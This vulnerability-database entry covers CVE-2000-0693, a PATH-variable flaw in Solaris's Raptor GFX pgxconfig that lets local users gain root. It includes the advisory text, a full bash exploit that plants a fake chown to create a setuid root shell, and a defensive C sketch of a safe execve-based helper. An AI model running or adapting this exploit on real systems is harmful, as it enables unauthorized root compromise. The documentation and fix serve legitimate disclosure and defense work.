Raptor GFX pgxconfig Command Execution Vulnerability

Vulnerability ID: 1105947    Vulnerability type: Unknown
Published: 2000-08-02    Updated: 2005-10-12
CVE ID: CVE-2000-0693
CNNVD-ID: CNNVD-200010-051
Platform: Solaris    CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/20147
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200010-051
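|Vulnerability details
pgxconfig in the Raptor GFX configuration tool invokes the "cp" program through a system call using a relative path name. A local user can exploit this to execute arbitrary commands by modifying their path to point to an alternate "cp" program.
|Exploit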
source: http://www.securityfocus.com/bid/1563/info

Raptor GFX cards are designed to handle 24-bit true color applications such as Netscape, seismic, geographical information systems (GIS), satellite imaging, pre-press imaging and general desktop use. They can also be used for high resolution 8-bit applications such as Insignia's SoftWindows, medical imaging and many legacy applications.

Certain versions of the software shipped to configure the Raptor GFX cards are vulnerable to a PATH environment variable attack due to insecure code within pgxconfig, the main configuration utility. In particular, pgxconfig uses an insecure system call (system(3s)). This function effectively executes binaries resident on the system from within the program. Given that this call must execute binaries on the system at hand, it relies on the $PATH variable to tell it where the system binaries reside. This variable is configurable by the user, and therefore a user can provide their own binary to be executed. In this particular case, because the program also issues a setuid(0) call (a call which sets the UID of the process, in this case to root), the program which the user substitutes is executed as root.


#!/usr/local/bin/bash

        # TechSource Raptor GFX configurator root exploit
        # [email protected]

        # unfortunately a compiler must be installed to use this example
        # exploit. however there's a million ways around this you know
        
        # on my system , gcc isnt in my path
        PATH=$PATH:/usr/local/bin

        # build a little prog nothing new here folks
        echo '#include<stdio.h>' > ./x.c
        echo 'int main(void) { setuid(0); setgid(0); execl("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c
        gcc x.c -o foobar
        rm -f ./x.c

        # build a substitute chown command. i much prefer this over
        # regular chown
        echo "#!/bin/sh" > chown
        echo "/usr/bin/chown root ./foobar" >> chown
        echo "/usr/bin/chmod 4755 ./foobar" >> chown
        chmod 0755 chown

        # oooh look its the magical fairy path variable
        export PATH=.:$PATH
        
        # heres one way to skin a cat
        # (theres more, some need valid devices. excercise for the readers)
        /usr/sbin/pgxconfig -i
        rm -f chown

        ./foobar
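
The fix for the pattern described above, as an added example that is not code from pgxconfig or from the original advisory: a privileged tool runs its helper by absolute path with execve and a fixed environment instead of passing a bare command name to system(3s). The helper name run_fixed and the PATH value in SAFE_ENV are assumptions made for this sketch.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for every child; nothing is inherited from the caller.
 * The PATH value is an assumption, adjust it for the target platform. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/usr/sbin:/bin", NULL };

/*
 * run_fixed (hypothetical helper): run argv[0] with no shell and no PATH
 * search. Returns the child's exit status, or -1 if the request is refused
 * or the child could not be started or reaped.
 */
int run_fixed(char *const argv[])
{
    if (argv == NULL || argv[0] == NULL || argv[0][0] != '/')
        return -1;                       /* refuse bare names such as "chown" */

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, SAFE_ENV); /* execve never consults $PATH */
        _exit(127);                      /* exec failed */
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed scenario: the caller puts the current directory in PATH. */
    setenv("PATH", ".", 1);

    char *bare[]  = { "chown", "root", "somefile", NULL };
    char *probe[] = { "/bin/sh", "-c",
                      "test \"$PATH\" = /usr/bin:/usr/sbin:/bin", NULL };

    printf("bare command name refused: %d\n", run_fixed(bare));
    printf("child sees only the fixed PATH: %d\n", run_fixed(probe));
    return 0;
}
```
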
|References

Source: BID
Name: 1563
Link: http://www.securityfocus.com/bid/1563
Source: BUGTRAQ
Name: 20000802LocalrootcompromiseinPGXConfigSunSparcSolaris
Link: http://archives.neohapsis.com/archives/bugtraq/2000-07/0463.html
Source: OSVDB
Name: 1501
Link: http://www.osvdb.org/1501
